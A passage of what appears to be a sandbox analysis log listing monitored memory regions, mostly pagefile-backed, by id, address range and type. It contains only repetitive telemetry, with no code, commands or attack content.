"pagefile_0x00000000044f0000" filename = "" Region: id = 7860 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7861 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7862 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7863 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7864 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7865 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7866 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7867 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7868 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7869 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7870 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7871 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7872 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7873 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7874 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7875 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7876 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7877 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7878 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7879 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7880 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7881 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7882 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7883 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7884 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7885 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7886 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7887 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7888 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7889 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7890 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7891 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7892 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7893 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7894 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7895 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7896 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7897 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7898 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7899 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7900 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7901 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7902 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7903 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7904 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7905 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7906 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7907 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7908 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7909 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7910 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7911 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7912 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7913 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7914 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7915 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7916 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7917 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7918 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7919 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7920 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7921 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7922 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7923 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7924 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7925 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7926 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7927 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7928 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7929 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7930 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7931 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7932 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7933 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7934 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7935 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7936 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7937 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7938 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7939 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7940 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7941 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7942 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7943 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7944 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7945 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7946 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7947 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7948 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7949 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7950 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7951 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7952 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7953 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7954 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7955 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7956 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7957 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7958 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7959 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7960 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7961 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7962 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7963 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7964 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7965 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7966 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7967 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7968 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7969 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7970 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7971 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7972 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7973 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7974 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7975 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7976 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7977 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7978 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7979 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7980 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7981 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7982 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7983 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7984 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7985 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7986 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7987 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7988 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7989 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7990 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7991 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7992 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7993 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7994 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7995 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7996 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7997 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7998 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7999 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8000 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8001 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8002 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8003 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8004 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8005 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8006 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8007 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8008 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8009 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8010 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8011 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8012 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8013 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8014 start_va = 0x44f0000 end_va = 0x4507fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8015 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8016 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8017 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8018 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8019 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8020 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8021 start_va = 0x44f0000 end_va = 0x4501fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8022 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8023 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8024 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8025 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 8026 start_va = 0x44f0000 end_va = 0x450bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 8027 start_va = 0x4510000 end_va = 0x451dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 8028 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8029 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8030 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8031 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8032 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8033 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8034 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8035 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8036 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8037 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" 